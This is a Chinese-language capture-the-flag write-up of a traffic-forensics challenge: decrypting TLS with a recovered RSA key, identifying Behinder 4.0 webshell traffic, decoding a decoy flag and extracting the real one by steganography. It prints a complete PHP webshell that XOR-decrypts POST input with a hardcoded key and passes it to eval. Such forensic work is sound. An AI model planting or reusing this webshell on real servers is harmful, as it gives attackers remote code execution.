找到key文件和图片
题目给了个压缩包,解压出来给了我们一个 .pcapng 文件 还有一个 txt文件。
我的网络设备被黑了,幸好有pcap包,帮我排查一下,黑客获取了啥敏感信息
文件名就是这个
点击wireshark的文件 -》导出http对象列表。发现列表里有一张图片还有一个key文件
查看那个key文件,拖入十六进制查看工具发现这个是RSA加密的key。
解密TLS流量
查看了一下流量包里的协议包,发现只有TLS协议进行了加密。那么推测这个key可以用来解密TLS协议包。利用那个key文件解密TLS协议包后,再追一些http流。在一个http包中找到了以下这段代码。
<?php
@error_reporting(0);
function decrypt($data){
$key="e45e329feb5d925b";
$bs="base64_"."decode";
$after=$bs($data."");
for($i=0;$i<strlen($after);$i++)
{
$after[$i] = $after[$i]^$key[$i+1&15];
}
return $after;}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>
搜索TLS,然后追踪TCP流。发现了部分协议包中有冰蝎4.0的流量特征。使用冰蝎4.0自带的解密脚本进行解密,协议名称那里根据前面发现的代码判断出是xor+base64
对含有冰蝎4.0流量特征的协议包进行数据解密
{"status":"c3VjY2Vzcw==","msg":"ZmxhZ3tLZWVwX2dvaW5nX2pwZ30K"},将数据再次进行base64解密
得到了flag{Keep_going_jpg},但是这个flag是错误的。但是这个flag里面的内容就是图片的文件名+文件后缀。说明解题还是看这个图片。
找到图片隐写密码
猜测是图片隐写利用Steghide尝试一下看看能不能出现东西,发现需要我们输入密码。回到流量包中查找,发现在这个流量包中这段命令解密
先把这段数据放入冰蝎进行解密,然后把这个cmd变量的这段base64进行解码,发现将这段串数字输入到文件中,文件名带有passwd。猜测这就是提取图片的密码
得出flag
最后从图片中获取到一个txt文件,然后得到了flag。